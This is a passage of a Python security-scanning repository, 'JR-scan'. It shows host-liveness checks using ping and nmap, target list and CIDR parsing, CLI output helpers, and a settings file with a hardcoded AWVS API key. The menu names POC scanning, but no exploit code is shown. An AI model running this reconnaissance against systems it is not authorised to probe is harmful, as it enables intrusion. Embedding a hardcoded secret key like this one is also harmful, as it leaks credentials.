https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/lib/__pycache__/bcolors.cpython-38.pyc


--------------------------------------------------------------------------------
/lib/__pycache__/cli_output.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/lib/__pycache__/cli_output.cpython-37.pyc


--------------------------------------------------------------------------------
/lib/__pycache__/cli_output.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/lib/__pycache__/cli_output.cpython-38.pyc


--------------------------------------------------------------------------------
/lib/__pycache__/enter.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/lib/__pycache__/enter.cpython-37.pyc


--------------------------------------------------------------------------------
/lib/__pycache__/enter.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/lib/__pycache__/enter.cpython-38.pyc


--------------------------------------------------------------------------------
/lib/__pycache__/setting.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/lib/__pycache__/setting.cpython-37.pyc


--------------------------------------------------------------------------------
/lib/__pycache__/setting.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/lib/__pycache__/setting.cpython-38.pyc


--------------------------------------------------------------------------------
/lib/__pycache__/sqldb.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/lib/__pycache__/sqldb.cpython-37.pyc


--------------------------------------------------------------------------------
/lib/__pycache__/sqldb.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/lib/__pycache__/sqldb.cpython-38.pyc


--------------------------------------------------------------------------------
/lib/active.py:
--------------------------------------------------------------------------------
 1 | import concurrent.futures
 2 | import subprocess
 3 | import re
 4 | import xml
 5 | import platform  # 获取操作系统的相关信息
 6 | import time
 7 | import nmap  # nmap模块
 8 | import dns.resolver
 9 | from urllib import parse  # parse模块的作用:url的解析,合并,编码,解码
10 | from lib.cli_output import console
11 | from lib.setting import PING
12 | 
13 | class ActiveCheck:
14 |     def __init__(self, hosts):
15 |         self.hosts = hosts
16 |         self.out = []
17 | 
18 |     def check(self, url):  # 检测导入的IP
19 |         loc = parse.urlparse(url)  # urlparse()实现URL的识别和分段
20 |         if getattr(loc, 'netloc'):  # getattr() 函数用于返回一个对象属性值。
21 |             host = loc.netloc  # 获得Ip域名
22 |         else:
23 |             host = loc.path  # 获得Ip路径
24 | 
25 |         try:
26 |             # 判断是IP还是域名,域名的话需要检测域名解析
27 |             if not re.search(r'\d+\.\d+\.\d+\.\d+', host):
28 |                 # 验证DNS存活并且DNS解析不能是一些特殊IP(DNSIP、内网IP)
29 |                 # resolver = dns.resolver.Resolver()
30 |                 # resolver.nameservers = ['1.1.1.1', '8.8.8.8']
31 |                 a = dns.resolver.query(host, 'A')  # 查询类型为A记录
32 |                 for i in a.response.answer:  # 通过response.answer获取查询回应信息
33 |                     for j in i.items:
34 |                         if hasattr(j, 'address'):  # 用于判断对象是否包含对应的属性。
35 |                             if re.search(r'1\.1\.1\.1|8\.8\.8\.8|127\.0\.0\.1|114\.114\.114\.114|0\.0\.0\.0',
36 |                                          j.address):
37 |                                 return False
38 |             if PING:
39 |                 try:
40 |                     # Windows调用ping判断存活 Linux调用nmap来判断主机存活
41 |                     # nmap判断存活会先进行ping然后连接80端口,这样不会漏掉
42 |                     if platform.system() == 'Windows':  # 获得系统名称
43 |                         subprocess.check_output(['ping', '-n', '2', '-w', '1', host])  # 执行命令
44 |                         self.out.append(url)  # 添加url到列
45 |                     else:
46 |                         nm = nmap.PortScanner()  # 实例化
47 |                         result = nm.scan(hosts=host, arguments='-sP -n')  # 可选参数,要扫描的方式
48 |                         for k, v in result.get('scan').items():
49 |                             if not v.get('status').get('state') == 'up':  # 获得主机信息
50 |                                 console('PING', host, "is not alive\n")  # 结果展示
51 |                                 return False
52 |                             else:
53 |                                 self.out.append(url)  # 添加url到列
54 |                 except:
55 |                     console('PING', host, "is not alive\n")  # 结果展示
56 |                     return False
57 |             else:
58 |                 self.out.append(url)
59 | 
60 |         except (dns.resolver.NoAnswer, dns.resolver.NXDOMAIN, dns.resolver.NoNameservers):
61 |             console('DnsCheck', host, "No A record\n")  # 描述失败原因
62 |         except dns.exception.Timeout:
63 |             console('DnsCheck', host, "Timeout\n")
64 | 
65 |     def pool(self):  # 数据处理模块
66 |         try:
67 |             with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor:  # 被用来创建线程池代码
68 |                 result = {executor.submit(self.check, i): i for i in self.hosts}  # 异步提交IP
69 |                 for future in concurrent.futures.as_completed(result, timeout=3):  # 返回一个包含 result 所指定的 Future 实例
70 |                     future.result()
71 |         except:
72 |             pass
73 |         return self.out  # 返回存活的主机
74 | 
75 | if __name__ == "__main__":
76 |     start_time = time.time()
77 |     active_hosts = ActiveCheck(['127.0.0.1']).pool()
78 |     end_time = time.time()
79 |     print(active_hosts)
80 |     print('\nrunning {0:.3f} seconds...'.format(end_time - start_time))
81 | 


--------------------------------------------------------------------------------
/lib/bcolors.py:
--------------------------------------------------------------------------------
1 | class Bcolors:
2 |     RED = '\033[31m'
3 |     ENDC = '\033[0m'  #NONE
4 |     WARNING = '\033[93m'
5 |     WHITE= "\033[1;37m"
6 |     BLUE = '\033[94m'
7 |     GREEN = '\033[92m'
8 |     MAGENTA='\033[35m'
9 | 


--------------------------------------------------------------------------------
/lib/cli_output.py:
--------------------------------------------------------------------------------
 1 | import pyfiglet   #ascii艺术字体
 2 | from lib.bcolors import Bcolors
 3 | import time
 4 | import sys
 5 | 
 6 | def banner():   #载入界面
 7 |     ascii_banner = pyfiglet.figlet_format("JinRong")    #使用字符组成ASCII艺术图片
 8 |     print(Bcolors.RED + ascii_banner + Bcolors.ENDC)
 9 | 
10 | def usage():
11 |         s = '帮助:\n'
12 |         s += '    [1]Information_Scan         信息收集\n'
13 |         s += '    [2]POC_Scan                 POC扫描\n'
14 |         s += '    [3]AWVS_Check               AWVS检测\n'
15 |         s += '    [4]H5_Create                结果展示\n'
16 |         s += '    [5]Help                     帮助\n'
17 |         s += '    [6]Exit                     退出'
18 |         print(Bcolors.BLUE + s + Bcolors.ENDC)
19 | 
20 | def console(plugins, domain, text):     #目标检测展示界面    已定义  目标  内容  console('PING', host, "is not alive\n")
21 |     timestamp = time.strftime("%H:%M:%S", time.localtime())
22 |     timestamp = Bcolors.BLUE + '[' + timestamp + ']' + Bcolors.ENDC
23 |     plugins = Bcolors.RED + plugins + Bcolors.ENDC
24 |     text = Bcolors.GREEN + text + Bcolors.ENDC
25 |     sys.stdout.write(timestamp + ' - ' + plugins + ' - ' + domain + '    ' + text)
26 | 
27 | if __name__ == '__main__':
28 |     banner()


--------------------------------------------------------------------------------
/lib/enter.py:
--------------------------------------------------------------------------------
 1 | import ipaddress    #处理IPv4和IPv6地址的
 2 | import re
 3 | from lib.active import ActiveCheck
 4 | 
 5 | def add(target):
 6 |     try:
 7 |         if re.search(r'\.txt$',target):
 8 |             hosts = read_file(target)
 9 |             if hosts:
10 |                 return hosts
11 |             else:
12 |                 return []
13 | 
14 |         if re.search(r'(\.\d+\/\d+$)', target):
15 |             hosts=inet(target)
16 |             if hosts:
17 |                 return hosts
18 |             else:
19 |                 return []
20 | 
21 |         else:
22 |             if ActiveCheck([target]).pool():
23 |                 return [target]
24 |             else:
25 |                 return []
26 |     except:
27 |         pass
28 |             
29 | def read_file(file):  #文件
30 |     hosts = []
31 |     try:
32 |         with open(file, 'rt') as f:
33 |             for ip in f.readlines():
34 |                 hosts.append(ip.strip())   #保存到host列中
35 |         hosts2 = ActiveCheck(hosts).pool()   #对不存在的IP进行测试
36 |         return hosts2
37 |     except FileNotFoundError:
38 |         print('input file')
39 | 
40 | def inet(net):   #C段
41 |     hosts = []
42 |     try:
43 |         result = list(ipaddress.ip_network(net))    #将C段切为一个个单独IP,写入列中
44 |         for ip in result:
45 |             hosts.append(str(ip))
46 |     except Exception as e:
47 |         print("The task could not be carried out. {}".format(str(e)))
48 |     hosts2 = ActiveCheck(hosts).pool()
49 |     return hosts2
50 | 
51 | 
52 | 
53 | 


--------------------------------------------------------------------------------
/lib/setting.py:
--------------------------------------------------------------------------------
 1 | # 全局超时时间
 2 | TIMEOUT = 5
 3 | 
 4 | # 设置扫描线程
 5 | THREADS = 100
 6 | 
 7 | # 如果存在于结果db中就跳过
 8 | CHECK_DB = False
 9 | 
10 | # ping探测
11 | PING = True
12 | 
13 | # 设置cookie
14 | COOKIE = 'random'
15 | # COOKIE = {'Cookie': 'SRCtest'}
16 | 
17 | #awvs api
18 | apikey='1986ad8c0a5b3df4d7028d5f3c06e936ccf47470c374d42f3a38c950f4bc80394'
19 | 
20 | # subdomain dir
21 | sub_dict = 'Information_Scan/data/path/wydomain.csv'
22 | next_sub_dict = 'Information_Scan/data/path/next_sub_full.txt'
23 | cnd_dict = 'Information_Scan/data/path/cdn_servers.txt'
24 | 
25 | #async dir
26 | dir = 'Information_Scan/data/path/dir.txt'
27 | 
28 | # 目录扫描模式
29 | dict_mode = 1
30 | 
31 | # 递归爬取模式
32 | crawl_mode = 1
33 | 
34 | # 设置代理
35 | # SOCKS5 = ('127.0.0.1', 1080)
36 | SOCKS5 = ()
37 | 
38 | #递归扫描的目录
39 | crawl_mode_parse_html =  "//*/@href | //*/@src | //form/@action"
40 | 


--------------------------------------------------------------------------------
/report/fonts/element-icons.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/report/fonts/element-icons.ttf


--------------------------------------------------------------------------------
/report/fonts/element-icons.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/report/fonts/element-icons.woff


--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
 1 | gevent==20.9.0
 2 | json
 3 | re 
 4 | time
 5 | termcolor==1.1.0
 6 | pyfiglet==0.8
 7 | dns==0.0.1
 8 | dnspython==2.0.0
 9 | nmap==0.0.1
10 | geoip2==4.1.0
11 | PySocks
12 | bs4
13 | lxml
14 | IPy==1.00
15 | 


--------------------------------------------------------------------------------
/result.db:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/result.db


--------------------------------------------------------------------------------